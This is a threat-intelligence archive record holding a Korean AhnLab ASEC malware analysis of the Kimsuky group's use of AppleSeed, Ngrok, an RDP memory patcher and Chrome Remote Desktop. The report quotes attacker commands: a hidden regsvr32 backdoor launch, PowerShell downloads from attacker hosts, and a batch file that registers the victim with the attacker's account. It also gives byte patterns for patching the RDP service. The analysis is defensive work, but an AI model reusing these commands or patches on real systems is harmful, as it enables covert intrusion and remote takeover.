{
	"id": "fa81c925-e9e9-49b1-8b4b-9154b493c19c",
	"created_at": "2026-04-06T01:30:12.765084Z",
	"updated_at": "2026-04-10T03:37:40.60464Z",
	"deleted_at": null,
	"sha1_hash": "a0837f6d022a8f7b8e50ab7d001645a181a82f0d",
	"title": "크롬 원격 데스크톱을 악용하는 Kimsuky 공격 그룹",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1505840,
	"plain_text": "크롬 원격 데스크톱을 악용하는 Kimsuky 공격 그룹\r\nBy ATCP\r\nPublished: 2023-06-28 · Archived: 2026-04-06 00:23:52 UTC\r\nAhnLab Security Emergency response Center(ASEC)에서는 최근 Kimsuky (김수키) 공격 그룹이 크롬 원격 데스크톱을\r\n악용하고 있는 것을 확인하였다. Kimsuky 공격 그룹은 감염 시스템에 대한 제어를 획득하기 위해 자체 제작 악성코\r\n드인 AppleSeed 외에도 Meterpreter와 같은 원격 제어 악성코드를 사용하고 있으며 [1], VNC를 커스터마이징하여 사\r\n용하거나 RDP Wrapper와 같은 원격 제어 도구들을 악용하는 이력도 꾸준히 확인된다. [2] 여기에서는 최근 확인된\r\n크롬 원격 데스크톱 악용 사례를 정리한다.\r\nKimsuky 공격 그룹은 북한의 지원을 받고 있다고 확인되는 위협 그룹으로서 2013년부터 활동하고 있다. 초기에는\r\n한국의 북한 관련 연구기관 등에 대한 공격을 진행하였으며, 2014년 한국의 에너지 기관에 대한 공격이 그리고 2017\r\n년 이후에는 한국 외의 다른 나라에 대한 공격도 확인되고 있다. [3]\r\n1. 공격 흐름\r\n최근 Kimsuky 그룹은 악성코드 유포 과정에서 주로 악성 한글 및 MS 오피스 문서 파일이나 CHM 포맷을 사용하고\r\n있다. 이러한 악성코드들이 첨부된 스피어 피싱 메일을 받은 사용자들은 정상 문서 파일로 생각하고 파일을 실행하\r\n게 되며 이에 따라 추가적인 악성코드가 시스템에 설치될 수 있다. AppleSeed 유포 과정에서는 주로 문서 파일들의\r\n확장자를 위장한 WSF나 JS와 같은 스크립트가 사용된다. 해당 악성코드를 실행하면 악성코드 실행과 함께 정상 문\r\n서 파일이 함께 실행되어 사용자는 정상적인 문서 파일을 실행한 것으로 인지할 수 있다.\r\n최초 유포 방식은 확인되지 않지만 다음과 같은 자사 AhnLab Smart Defense (ASD) 로그를 통해 Kimsuky 공격 그룹\r\n은 WSF나 JS와 같은 스크립트 악성코드를 공격에 사용한 것으로 추정된다. 해당 로그는 과거 사례에서도 드로퍼\r\n기능을 담당하는 스크립트 악성코드가 파워쉘 명령을 이용해 파일을 디코딩하는 과정에서 사용되었다. [4]\r\nFigure 1. 악성코드 설치 로그\r\n디코딩된 악성코드는 AppleSeed이며 다음과 같은 인자를 이용해 실행시켰다. 인자들 중에서 “/I”에 입력되는\r\n“123qweASDZXC”는 AppleSeed 실행 시 필요한 조건으로서 해당 인자가 사용되지 않을 경우 AppleSeed는 동작하지\r\n않는다.\r\n\u003e powershell.exe -windowstyle hidden cmd /c cmd /c regsvr32.exe /s /n /i:123qweASDZXC\r\nC:\\Windows\\..\\ProgramData\\o5C2anK.efgL\r\n공격자는 이후 AppleSeed를 이용해 다양한 추가 악성코드들을 설치하였다. 여기에는 과거부터 Kimsuky 그룹이 꾸\r\n준히 사용하고 있는 인포스틸러, RDP Patcher 악성코드와 Ngrok가 있다. 이외에도 공격자가 원격으로 감염 시스템\r\n을 제어할 수 있도록 크롬 원격 데스크톱을 설치하는 로그도 함께 확인된다.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 1 of 9\n\nFigure 2. Ngrok를 설치하는 AppleSeed 악성코드\r\n2. 공격 과정에서 사용된 악성코드 분석\r\n2.1. AppleSeed\r\nAppleSeed는 2019년경부터 확인된 악성코드로서 Kimsuky 공격 그룹의 공격 사례 중 상당수에서 확인되는 백도어\r\n악성코드이다. ASEC 블로그에서도 AppleSeed를 이용한 다양한 공격 사례들을 공개하고 있다. [5] [6] [7] AppleSeed\r\n는 C\u0026C 서버로부터 전달받은 공격자의 명령을 수행하거나 추가 악성코드 설치, 키로깅 및 스크린 캡쳐 그리고 사\r\n용자 시스템의 파일들을 탈취하는 등 다양한 기능들을 지원한다.\r\nAppleSeed와 관련된 상세한 분석 정보는 다음 보고서를 참고하면 된다.\r\n– https://asec.ahnlab.com/ko/28741/\r\n현재 공격에서 사용된 AppleSeed는 두 개이며 모두 C\u0026C 서버와의 통신 HTTP 프로토콜을 사용한다. 두 개의\r\nAppleSeed 중 하나는 실행 시 다음과 같이 인자가 필요한 형태이다.\r\n\u003e regsvr32.exe /s /n /i:123qweASDZXC C:\\Windows\\..\\ProgramData\\o5C2anK.efgL”\r\n악성코드\r\n프로\r\n토콜\r\n경로 인자\r\nAppleSeed HTTP %APPDATA%Adobe\\Service\\AdobeService.dll 123qweASDZXC\r\nAppleSeed HTTP %APPDATA%EastSoft\\Control\\Service\\EastSoftUpdate.dll N/A\r\nTable 1. 공격에 사용된 AppleSeed 분류\r\n2.2. 인포스틸러\r\nKimsuky 공격 그룹은 AppleSeed 설치 이후 다양한 악성코드들을 추가적으로 설치하는 편이다. 대표적으로 정보 탈\r\n취 악성코드가 있는데, 과거에는 구글 크롬 웹 브라우저를 대상으로 계정 정보를 수집하여 다음 경로에 텍스트 파일\r\n형태로 저장하는 인포스틸러가 사용되었다.\r\n크롬 탈취 정보 저장 경로 : C:\\ProgramData\\Adobe\\mui.db\r\n최근에는 조금 더 업그레이드된 형태로서 구글 크롬 외에 마이크로소프트 엣지나 네이버 웨일 웹 브라우저에 저장\r\n되어 있는 계정 정보를 탈취하는 악성코드가 사용되고 있다. 참고로 해당 악성코드는 작년에 최초로 확인되었으며\r\n유사 유형이 아닌 동일한 악성코드가 지속적으로 사용되고 있는 점이 특징이다.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 2 of 9\n\nFigure 3. 웹 브라우저에서 수집한 계정 정보가 저장된 경로\r\n계정 정보 탈취 대상 웹 브라우저 계정 정보 저장 경로\r\n구글 크롬 C:\\ProgramData\\Adobe\\ch.db\r\n마이크로소프트 엣지 C:\\ProgramData\\Adobe\\ed.db\r\n네이버 웨일 C:\\ProgramData\\Adobe\\nw.db\r\nTable 2. 계정 정보 탈취 대상 및 저장 경로\r\n공격자는 해당 경로에 텍스트 파일 형태로 저장된 사용자의 계정 정보들을 AppleSeed나 다른 악성코드를 이용해 탈\r\n취할 것으로 추정된다.\r\n2.3. RDP Patcher\r\n일반적인 윈도우 환경에서는 한 대의 PC에 하나의 RDP 접속만 허용된다. 이에 따라 공격자가 감염 시스템의 계정\r\n정보를 알고 있다고 하더라도 만약 기존 사용자가 로컬에서 작업 중이거나 또는 사용자가 RDP를 이용해 현재 시스\r\n템에 접속하여 사용하고 있을 경우에는 사용자의 인지 없이 RDP 연결이 불가하다. 현재 사용자가 작업 중인 환경에\r\n서 공격자가 RDP 연결을 시도할 경우 기존 사용자는 로그오프되기 때문이다.\r\n이를 우회하기 위한 방식으로는 Remote Desktop Service의 메모리를 패치하여 다중 원격 데스크톱 접속을 허용하게\r\n하는 방식이 있다. 대표적으로 Mimikatz도 ts::multirdp 명령을 통해 이러한 기능을 지원한다. ts::multirdp 명령을 사용\r\n하면 현재 실행 중인 Remote Desktop Service 즉 termsrv.dll을 로드한 svchost.exe에서 해당 DLL의 주소를 구한 후 특\r\n정 바이너리 패턴을 검색한다. 이는 윈도우 버전마다 다르기 때문에 각각의 버전에 따라 검색 패턴이 정의되어 있\r\n다. 정의된 패턴이 존재하면 이를 새로운 바이너리 패턴으로 패치하며 패치 이후부터는 다중 RDP가 가능하다.\r\nKimsuky 그룹은 다중 RDP를 위한 메모리 패치를 전담하는 악성코드를 지속적으로 사용하고 있다. 현재 확인된 악\r\n성코드는 x64 윈도우 아키텍처에 대해서만 동작하며 작년부터 공격에 사용되고 있다. 과거 RDP Patcher 악성코드는\r\nPDB 정보가 존재하지 않았으며, DLL 이름 “hp_aux_multirdp.dll”만 확인이 가능하였다. 현재 확인된 악성코드는 다\r\n음과 같은 PDB 정보를 가지고 있는 것이 특징이다.\r\nPDB 경로 정보 : E:\\00.duty\\03.source\\01.pc\\pc-engine\\hope\\x64\\Release\\hp_aux_multirdp.pdb\r\n검색 패턴 및 패치 패턴은 미미카츠의 소스 코드와 유사한데, 차이점이 있다면 Windows XP 버전도 지원한다는 점\r\n이 있다. 다음은 각 윈도우 버전에서 검색 패턴 및 패치할 패턴 목록이다.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 3 of 9\n\n윈도우 버전\r\n(x64) 검색 패턴 패치 패턴\r\nWindows XP \r\n( 2600 ) 이상\r\n{0x83, 0xf8, 0x02, 0x7f} {0x90, 0x90}\r\nWindows\r\nVista \r\n( 6000 )\r\n{0x8b, 0x81, 0x38, 0x06, 0x00, 0x00,\r\n0x39, 0x81, 0x3c, 0x06, 0x00, 0x00,\r\n0x75};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff,\r\n0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb};\r\nWindows 7 \r\n( 7600 )\r\n{0x39, 0x87, 0x3c, 0x06, 0x00, 0x00,\r\n0x0f, 0x84};\r\n{0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff,\r\n0xff, 0xff, 0x7f, 0x90, 0x90};\r\nWindows 8.1 \r\n( 9600 )\r\n{0x39, 0x81, 0x3c, 0x06, 0x00, 0x00,\r\n0x0f, 0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff,\r\n0xff, 0xff, 0x7f, 0x90, 0x90};\r\nWindows 10,\r\nVersion \r\n1803 ( 17134\r\n)\r\n{0x8b, 0x99, 0x3c, 0x06, 0x00, 0x00,\r\n0x8b, 0xb9, 0x38, 0x06, 0x00, 0x00,\r\n0x3b, 0xdf, 0x0f, 0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff,\r\n0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90,\r\n0x90, 0xe9};\r\nWindows 10, \r\nVersion 1809 \r\n( 17763 ) 이\r\n상\r\n{0x8b, 0x81, 0x38, 0x06, 0x00, 0x00,\r\n0x39, 0x81, 0x3c, 0x06, 0x00, 0x00,\r\n0x0f, 0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff,\r\n0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90,\r\n0x90, 0x90, 0x90, 0x90};\r\nTable 3. RDP 서비스 검색 및 패치 패턴\r\n2.4. Ngrok\r\nNgrok는 터널링 프로그램으로서 외부에서 NAT 환경 내부에 존재하는 시스템에 접속할 수 있게 노출시켜 주는 도구\r\n이다. Kimsuky 공격 그룹은 공격 과정에서 Ngrok를 자주 사용하고 있다. 직접적인 사용 사례는 확인되지 않지만 감\r\n염 시스템에 대한 원격 데스크톱 접속을 위한 것이 목적으로 보인다.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 4 of 9\n\nFigure 4. Ngrok\r\nKimsuky 공격 그룹은 감염 시스템에 대한 제어를 획득하기 위해 원격 데스크톱 서비스를 사용하는 경향이 있다. 이\r\n에 따라 RDP Wrapper나 위의 RDP Patcher 등 RDP와 관련된 다양한 악성코드들이 자주 사용된다. 하지만 감염 시스\r\n템이 NAT 환경 내부에 존재할 경우 IP 및 계정 정보를 알고 있다고 하더라도 원격 데스크톱으로 접속이 불가하다.\r\nKimsuky 공격 그룹은 이러한 문제를 해결하기 위해 Ngrok를 사용하는 것으로 보이며, 실제 확인된 공격 사례 다수\r\n에서 Ngrok가 함께 확인되고 있다.\r\n공격자는 다음과 같은 명령을 AppleSeed에 전달하여 외부에서 Ngrok를 설치하였다. 현재 네이버 메일 URL에서는\r\n다운로드가 불가하지만 명령 실행 시점과 다운로드 경로를 통해 Ngrok가 업로드되었던 주소일 것으로 추정된다.\r\n참고로 Ngrok가 ProgramData 폴더 내에 svchost.exe라는 이름으로 설치되는 사례는 과거부터 꾸준히 확인되고 있다.\r\nFigure 5. Ngrok 설치 로그\r\n\u003e powershell wget hxxp://****[.]kr/gnuboard4/ngsvc.dat -outfile c:\\programdata\\svchost.exe\r\n\u003e powershell wget hxxps://bigfile.mail.naver[.]com/download?\r\nfid=lekqm6cmwzu9hqujfovzfq2lfamjkogzkqgrkoewkoeqkabjkxmlkaulfqula3ydaxgrp63cm4u9mopvmqbmpxm/kzk0kzewkxbmfq\r\n-outfile c:\\programdata\\svchost.exe\r\n3. 크롬 원격 데스크톱\r\nKimsuky 공격 그룹은 AppleSeed나 Meterpreter와 같은 백도어 악성코드를 이용해 감염 시스템에 대한 제어를 획득\r\n한 이후에도 GUI 환경의 원격 제어를 위해 추가적인 악성코드들을 설치하였다. 만약 윈도우의 RDP 프로토콜을 이\r\n용할 경우에는 위에서 다룬 악성코드들이 사용될 것이며 다수의 공격 사례에서 RDP Wrapper를 추가적으로 설치하\r\n는 사례도 존재한다.\r\n물론 RDP 프로토콜 외에 TinyNuke나 TightVNC와 같은 VNC 악성코드들을 직접 제작하여 원격 데스크톱 제어를 수\r\n행하는 경우도 있다. [8] 최근에는 구글의 크롬 원격 데스크톱을 악용하는 사례가 확인된다.\r\n구글은 크롬 원격 데스크톱(Chrome Remote Desktop)이라는 기능을 지원한다. 특정 시스템에 사용자의 계정으로 원\r\n격 데스크톱 프로그램을 설치할 경우 다른 시스템에서 크롬 웹 브라우저로 해당 시스템에 대한 원격 제어 기능을 제\r\n공하는 기능이다. 일반적으로 원격 제어 대상이 되는 시스템의 크롬 브라우저에서 원격 제어를 설정하는 방식이 대\r\n부분이겠지만 크롬은 직접 원격 제어 호스트 프로그램을 설치하는 방식도 지원한다.\r\n예를 들어 원격 제어 대상 장비에 크롬 원격 제어 호스트 프로그램을 설치하고 다음과 같은 인자들과 함께 커맨드\r\n라인 명령을 실행할 수 있다. 해당 명령은 크롬 웹 브라우저에서 로그인한 이후 생성할 수 있으며 인증 코드는 매번\r\n변경된다.\r\n“%PROGRAMFILES(X86)%\\Google\\Chrome Remote Desktop\\CurrentVersion\\remoting_start_host.exe”\r\n–code=”인증 코드”\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 5 of 9\n\n–redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect”\r\n–name=%COMPUTERNAME%\r\nFigure 6. 크롬 원격 데스크톱호스트 프로그램 실행 명령\r\n위와 같은 명령을 실행한 이후 PIN 번호를 입력하면, 이후 크롬 웹 브라우저에서 원격 제어 대상 장비가 온라인 상\r\n태인 것을 보여준다. 해당 장비에 접속하고 크롬 원격 제어 호스트 실행 시 입력했던 PIN 번호를 입력하면 크롬 웹\r\n브라우저에서 원격 제어가 가능하다.\r\nFigure 7. 온라인 상태인 원격 제어 대상 장비\r\n공격자는 먼저 AppleSeed에 다음과 같은 파워쉘 명령을 전달하여 크롬 원격 데스크톱 호스트 인스톨러를 설치하였\r\n으며, 설치가 끝난 이후에는 크롬 원격 데스크톱 호스트를 제어하는 23.bat 파일을 설치하였다.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 6 of 9\n\nFigure 8. 크롬 원격 데스크톱 호스트를 실행하는 Batch 스크립트 설치\r\n\u003e powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -\r\noutfile c:\\programdata\\cm.msi\r\n\u003e powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\\programdata\\23.bat\r\n23.bat 파일은 위의 크롬 원격 데스크톱 실행 명령과 유사하며 “–pin” 인자가 함께 사용되어 커맨드 라인 상으로도\r\n추가적인 작업 없이 동작할 수 있도록 하였다. 공격에 사용된 인증 코드는 공격자의 구글 계정으로 제작된 것이며,\r\n공격자는 크롬 웹 브라우저에서 감염 시스템을 제어할 수 있을 것이다.\r\nFigure 9. 23.bat 파일의 내용\r\n“%PROGRAMFILES(X86)%\\Google\\Chrome Remote Desktop\\CurrentVersion\\remoting_start_host.exe” \r\n–code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” \r\n–redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” \r\n–name=%COMPUTERNAME% \r\n–pin=230625\r\n4. 결론\r\nKimsuky 공격 그룹은 국내 사용자들을 대상으로 지속적으로 스피어 피싱 공격을 수행하고 있다. 주로 메일의 첨부\r\n파일로 문서 파일을 위장한 악성코드를 유포하는 방식이며 사용자가 이를 실행할 경우 현재 사용 중인 시스템에 대\r\n한 제어가 탈취될 수 있다.\r\nKimsuky 공격 그룹은 감염 시스템에 대한 제어를 탈취하기 위해 AppeSeed나 Meterpreter 그리고 VNC 악성코드들을\r\n사용하고 있으며, 윈도우 시스템에 기본적으로 존재하는 RDP 원격 데스크톱 서비스를 악용하기도 한다. 최근에는\r\n원격 제어를 위해 구글 크롬의 원격 데스크톱 기능을 악용하는 사례도 확인되고 있다.\r\n사용자들은 의심스러운 메일을 받게 된다면 첨부 파일의 실행을 지양해야 하며, V3를 최신 버전으로 업데이트하여\r\n악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.\r\n파일 진단\r\n– Downloader/BAT.Agent (2023.06.27.03)\r\n– Backdoor/Win.AppleSeed.R588872 (2023.06.27.02)\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 7 of 9\n\n– Trojan/Win.Akdoor.R470485 (2022.02.05.00)\r\n– Trojan/Win.Generic.R577010 (2023.05.15.02)\r\n행위 진단\r\n– Execution/MDP.Regsvr32.M4470\r\n– Execution/EDR.Regsvr32.M11168 (EDR)\r\n– Execution/MDP.Regsvr32.M11169 (MDS)\r\nMD5\r\n80f381a20d466e7a02ea37592a26b0b8\r\n946e1e0d2e0d7785d2e2bcd3634bcd2a\r\nb6d11017e02e7d569cfe203eda25f3aa\r\nd2eb306ee0d7dabfe43610e0831bef49\r\nd6a38ffdbac241d69674fb142a420740\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nURL\r\nhttp[:]//getara1[.]mygamesonline[.]org/\r\nhttp[:]//okas[.]kr/gnuboard4/23[.]bat\r\nhttp[:]//okas[.]kr/gnuboard4/ngsvc[.]dat\r\nhttp[:]//pikaros2[.]r-e[.]kr/\r\nhttps[:]//bigfile[.]mail[.]naver[.]com/download?\r\nfid=lekqm6cmwzu9hqujfovzfq2lfamjkogzkqgrkoewkoeqkabjkxmlkaulfqula3ydaxgrp63cm4u9mopvmqbmpxm/kzk0kzewkxbmfqvxp2==\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nFQDN\r\npikaros2[.]r-e[.]kr\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nAhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래\r\n배너를 클릭하여 확인해보세요.\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 8 of 9\n\nSource: https://asec.ahnlab.com/ko/54804/\r\nhttps://asec.ahnlab.com/ko/54804/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "KO",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/ko/54804/"
	],
	"report_names": [
		"54804"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439012,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a0837f6d022a8f7b8e50ab7d001645a181a82f0d.pdf",
		"text": "https://archive.orkl.eu/a0837f6d022a8f7b8e50ab7d001645a181a82f0d.txt",
		"img": "https://archive.orkl.eu/a0837f6d022a8f7b8e50ab7d001645a181a82f0d.jpg"
	}
}